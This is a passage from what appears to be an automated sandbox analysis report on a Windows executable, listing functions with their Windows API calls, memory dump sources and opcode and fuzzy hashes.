                                      • Instruction Fuzzy Hash: 51212572E00215EFEB10CBB8DC85BAE7BB8EB44701F0545A6E905EB2D2D7749A448B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043E76B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,?), ref: 0043E7DC
                                        • Part of subcall function 0043E840: GetDriveTypeA.KERNEL32(?,?,0043E782,?,?), ref: 0043E85F
                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 0043E7C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CurrentDirectoryDriveFullNamePathType
                                      • String ID: .$:
                                      • API String ID: 3995704478-4202072812
                                      • Opcode ID: 0b4f02c8fb91d5c12c47bc976b6d0318bfb2293ccf827d128ac51334d529a334
                                      • Instruction ID: 96f66a06455795a8d7e8fe4d707ddfbcba76b526f76ec80e4462f38d11eaf525
                                      • Opcode Fuzzy Hash: 0b4f02c8fb91d5c12c47bc976b6d0318bfb2293ccf827d128ac51334d529a334
                                      • Instruction Fuzzy Hash: 9D21A8712092459FEB15EF66D881BDE37A8AF08304F10649BF655DB2C1DB78E980C62D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044ACAC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongA.USER32 ref: 0044ACBD
                                      • GetClassNameA.USER32(00000000,?,0000000A), ref: 0044ACD8
                                      • lstrcmpiA.KERNEL32(?,combobox), ref: 0044ACE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ClassLongNameWindowlstrcmpi
                                      • String ID: combobox
                                      • API String ID: 2054663530-2240613097
                                      • Opcode ID: 855d9a187ad83f61b53a2fd792def37e03ef9ecdf610848a0810b06748a9b197
                                      • Instruction ID: a4b06bf249304631700a785cc4aef3e2afeefb96581d6df7a967ac7ec71e46fe
                                      • Opcode Fuzzy Hash: 855d9a187ad83f61b53a2fd792def37e03ef9ecdf610848a0810b06748a9b197
                                      • Instruction Fuzzy Hash: 27E0E531594208BBDF009F60DC89F9E3768A701302F108532B823D61E1D634D555C65A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00438B03, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(KERNEL32,00435228), ref: 00438B08
                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00438B18
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                      • API String ID: 1646373207-3105848591
                                      • Opcode ID: b9aae6056e8e5ffd4b77bea46f9d9235fddcdb262ccc5e972e76fe677a27723e
                                      • Instruction ID: 7b84e06858efe0736819d8acebd0796357ac23fa3cfc35eb7d0c083feac4e047
                                      • Opcode Fuzzy Hash: b9aae6056e8e5ffd4b77bea46f9d9235fddcdb262ccc5e972e76fe677a27723e
                                      • Instruction Fuzzy Hash: F9C08CA038030277DB202BB00C09FA7A12C9B4DB03F2C60AB7205D00F0EE5CC800E02E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004390B1, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 264memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualFree.KERNEL32(?,00008000,00004000,00000000,?,?), ref: 00439308
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00439363
                                      • HeapFree.KERNEL32(00000000,?), ref: 00439375
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Free$Virtual$Heap
                                      • String ID: ;hC
                                      • API String ID: 2016334554-2509120230
                                      • Opcode ID: 476b62d165d1789a68cccf685f7be7706af3c580fd76392f2971441884d7051f
                                      • Instruction ID: 24126ea347c4c96d0f07a69f9be3c5a353fc25f896a305f78bf40c09cfa22ff5
                                      • Opcode Fuzzy Hash: 476b62d165d1789a68cccf685f7be7706af3c580fd76392f2971441884d7051f
                                      • Instruction Fuzzy Hash: 9BB172355002059FDB18CF44D990A69BBB2FF88324F25C2AED80A5B396C775ED82CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044E9D3, Relevance: 6.2, APIs: 4, Instructions: 208stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0044EA03
                                        • Part of subcall function 0044E754: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 0044E81F
                                        • Part of subcall function 0044E754: SysFreeString.OLEAUT32(00000000), ref: 0044E84C
                                      • VariantClear.OLEAUT32(0000000C), ref: 0044EB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Variant$ChangeClearFreeStringTypelstrlen
                                      • String ID:
                                      • API String ID: 36103042-0
                                      • Opcode ID: ea6ba70824c02515fb7e6071f306181cc43f5f5b1be2feada4ac61410175e345
                                      • Instruction ID: fc50199ab1f7a27eb6457bc09dfac7fc23ebdc11acc75d07790cdb9a51b7374c
                                      • Opcode Fuzzy Hash: ea6ba70824c02515fb7e6071f306181cc43f5f5b1be2feada4ac61410175e345
                                      • Instruction Fuzzy Hash: 1D71C83190020AEBEF10DF96D885AAFBBB0FF04350F14855AF8059B252D738ED45DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043A16B, Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 0043A1E5
                                      • GetLastError.KERNEL32 ref: 0043A1EF
                                      • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 0043A2B5
                                      • GetLastError.KERNEL32 ref: 0043A2BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ErrorFileLastRead
                                      • String ID:
                                      • API String ID: 1948546556-0
                                      • Opcode ID: 1e1b84975f26cc51d4158bfd38237042a3ce6184264c28f2b29890be7ec3f51c
                                      • Instruction ID: 9f043cc73bbe67966edcb2dacdcbed3d37758d59ac63692d0a32518417bc34af
                                      • Opcode Fuzzy Hash: 1e1b84975f26cc51d4158bfd38237042a3ce6184264c28f2b29890be7ec3f51c
                                      • Instruction Fuzzy Hash: C351E8745483849FDF218F98C8847AE7BB0BF1A304F14549BE8E18B391D3799962CB1B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004314D4, Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32 ref: 004314F2
                                      • GetDesktopWindow.USER32 ref: 00431505
                                      • GetWindowRect.USER32 ref: 00431518
                                      • GetWindowRect.USER32 ref: 00431525
                                        • Part of subcall function 0044706C: MoveWindow.USER32(?,?,?,00000000,?,?,?,00431666,?,?,?,?,00000000), ref: 00447088
                                        • Part of subcall function 004470FC: ShowWindow.USER32(?,M!@,0044850B,00000000,0000E146,00000000,?,?,0040214D), ref: 0044710A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Rect$DesktopMoveShowVisible
                                      • String ID:
                                      • API String ID: 3835705305-0
                                      • Opcode ID: 7dda426fe8538b4a0594c820dd061b566554bef50830a9c833efc187c30709c6
                                      • Instruction ID: aaa5cddaafe54c94b0b4062213d65f9161940805706fea7222b74cbc75b1cee8
                                      • Opcode Fuzzy Hash: 7dda426fe8538b4a0594c820dd061b566554bef50830a9c833efc187c30709c6
                                      • Instruction Fuzzy Hash: 16510771A0020AEFDB00DFE8C995DAEB7B9EF48304B24445AF606E7260DB35AD05CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043AA83, Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,18E8F04D), ref: 0043AB4A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 8b67528b897beed40f26bdaa44c730f858f027e4b27ea0faac0772919ca74776
                                      • Instruction ID: 6d331ad10b7fb09e0b1b9ac925deb209e42d6556e960c6de3880382c7c0b3bf8
                                      • Opcode Fuzzy Hash: 8b67528b897beed40f26bdaa44c730f858f027e4b27ea0faac0772919ca74776
                                      • Instruction Fuzzy Hash: 1051157194020CEFCB11CFA8C884B9DBBB1FF49340F1491ABE5959B261D734EA50CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00442C60, Relevance: 6.1, APIs: 4, Instructions: 131COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPropA.USER32 ref: 00442CA6
                                      • CallWindowProcA.USER32 ref: 00442CD1
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID:
                                      • API String ID: 2276450057-0
                                      • Opcode ID: a834c6b329f7f72b55205d2c1f7b7db6531291d119d656269ea7bc2b47ea69c4
                                      • Instruction ID: 4e40b68babcb6aca3d269c1a4ddd32acdd729ba96edb34d93745b6cc9cb42b34
                                      • Opcode Fuzzy Hash: a834c6b329f7f72b55205d2c1f7b7db6531291d119d656269ea7bc2b47ea69c4
                                      • Instruction Fuzzy Hash: 99311CB6E0020457F7209A05FD85AAFB398EB96335F840937F90453211D76DAD89827F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042E872, Relevance: 6.1, APIs: 4, Instructions: 127windowthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(?,00000138,?,?), ref: 0042E911
                                      • GetBkColor.GDI32(?), ref: 0042E91A
                                      • GetTextColor.GDI32(?), ref: 0042E926
                                      • GetThreadLocale.KERNEL32(0000F1C0), ref: 0042E9B5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Color$LocaleMessageSendTextThread
                                      • String ID:
                                      • API String ID: 1680304473-0
                                      • Opcode ID: f0635388f5368ae657502a509a1e22b09b2b96706088fae6d7fc52b1248721f1
                                      • Instruction ID: bf7b76f6536e0eed2f188dc5e8b980c3b2b0fb25e44c93434d1a66aa7730a144
                                      • Opcode Fuzzy Hash: f0635388f5368ae657502a509a1e22b09b2b96706088fae6d7fc52b1248721f1
                                      • Instruction Fuzzy Hash: EC51B371A10716DFCB20DF16E8405AAB7F0FF04310B60891FF856A76A1D778B945CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043DEB6, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00438F7B: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FB8
                                        • Part of subcall function 00438F7B: EnterCriticalSection.KERNEL32(?,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FD3
                                      • InitializeCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,004297D0,004297D0,0043E32B,004297D1,00000000,00000000), ref: 0043DF09
                                      • EnterCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,004297D0,004297D0,0043E32B,004297D1,00000000,00000000), ref: 0043DF1E
                                      • LeaveCriticalSection.KERNEL32(00000068,?,00000000,004297D0,004297D0,0043E32B,004297D1,00000000,00000000), ref: 0043DF2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalSection$EnterInitialize$Leave
                                      • String ID:
                                      • API String ID: 713024617-3916222277
                                      • Opcode ID: 861395bf9e705e72fae14341c0460e642e3ace1b76ee42f298a9f7a46117f27c
                                      • Instruction ID: d3b6511b414e5803e10135de48c2735a862b888887d52eb8ea6767945a94fd4d
                                      • Opcode Fuzzy Hash: 861395bf9e705e72fae14341c0460e642e3ace1b76ee42f298a9f7a46117f27c
                                      • Instruction Fuzzy Hash: 973126729053015FD3209F24ECC4B5BB7D0AB49329F249A2FF566472E2D778D888C719
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00430F27, Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FreeString$ClearVariant
                                      • String ID:
                                      • API String ID: 3349467263-0
                                      • Opcode ID: f95df874e8e362d64165b844aa0114fd65b8aee60bf34fe9b22eb9aa5c0b7bcc
                                      • Instruction ID: 67eed657a93d079a6dc71f060c19d97e7e4b55ad3b2258be5aaf9d78df9dbb60
                                      • Opcode Fuzzy Hash: f95df874e8e362d64165b844aa0114fd65b8aee60bf34fe9b22eb9aa5c0b7bcc
                                      • Instruction Fuzzy Hash: 7E314875A01218AFCB14DFA5C884EDEBBB8FF08754F50812AF508A6250D774A984CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044B412, Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044B58A: GetParent.USER32(?), ref: 0044B5BD
                                        • Part of subcall function 0044B58A: GetLastActivePopup.USER32(?), ref: 0044B5CC
                                        • Part of subcall function 0044B58A: IsWindowEnabled.USER32(?), ref: 0044B5E1
                                        • Part of subcall function 0044B58A: EnableWindow.USER32(?,00000000), ref: 0044B5F4
                                      • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0044B448
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0044B4B6
                                      • MessageBoxA.USER32 ref: 0044B4C4
                                      • EnableWindow.USER32(00000000,00000001), ref: 0044B4E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
                                      • String ID:
                                      • API String ID: 1958756768-0
                                      • Opcode ID: 5e1648d3ba3878ca7e40aa48709f20328752c3879076c2051202c4b80343edfd
                                      • Instruction ID: e4cc0cd26b021f80ffb85e5c022fb857e680b74358b8f4a4fa587f51755a2e3e
                                      • Opcode Fuzzy Hash: 5e1648d3ba3878ca7e40aa48709f20328752c3879076c2051202c4b80343edfd
                                      • Instruction Fuzzy Hash: 50218272A00208ABEB20DFA5CCC1BAEB7B9EB44354F14446AF650E3252C778DD408BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449E25, Relevance: 6.1, APIs: 4, Instructions: 85stringtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcpynA.KERNEL32(00449E21,?,00000104,?,?,?,?,?,?,?,00449E0F,?), ref: 00449E4F
                                      • GetFileTime.KERNEL32(00000000,00449E0F,?,?,?,?,?,?,?,?,?,00449E0F,?), ref: 00449E70
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00449E0F,?), ref: 00449E7F
                                      • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,00449E0F,?), ref: 00449EA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: File$AttributesSizeTimelstrcpyn
                                      • String ID:
                                      • API String ID: 1499663573-0
                                      • Opcode ID: 890932de0ac3b0bce48018eab991eed3ca4d0963c59e5fd7c23c5cc88624ecca
                                      • Instruction ID: 7aaf32ab8d7a2899719801dbdd4ef9135f4c96c6dbdf950de52e1e7297c202fe
                                      • Opcode Fuzzy Hash: 890932de0ac3b0bce48018eab991eed3ca4d0963c59e5fd7c23c5cc88624ecca
                                      • Instruction Fuzzy Hash: 393180B2500605AFE720DFA5C885BABBBB8BB14311F10492FF156D7690DB74E984CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004367CB, Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetVersion.KERNEL32 ref: 004367F1
                                        • Part of subcall function 0043900C: HeapCreate.KERNELBASE(00000000,00001000,00000000,00436829,00000001), ref: 0043901D
                                        • Part of subcall function 0043900C: HeapDestroy.KERNEL32 ref: 0043903B
                                      • GetCommandLineA.KERNEL32 ref: 00436851
                                      • GetStartupInfoA.KERNEL32(?), ref: 0043687C
                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0043689F
                                        • Part of subcall function 004368F8: ExitProcess.KERNEL32 ref: 00436915
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                      • String ID:
                                      • API String ID: 2057626494-0
                                      • Opcode ID: 91b0f543fc85fcc470683452b9434a51f0611b18f0c411177d2b1b4e9f734bda
                                      • Instruction ID: 6d894ef55fc57fbde16c7f7b25bc0d2537ac2592af84e1baa4634e1fd2d221f7
                                      • Opcode Fuzzy Hash: 91b0f543fc85fcc470683452b9434a51f0611b18f0c411177d2b1b4e9f734bda
                                      • Instruction Fuzzy Hash: 6621A5B1C00705AFDB18BFA69C46B6E7BA8EF0C704F10552FF5059A2A1DB788440CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00440A80, Relevance: 6.1, APIs: 4, Instructions: 65windowCOMMON
                                      Download Yara Rule
                                      APIs
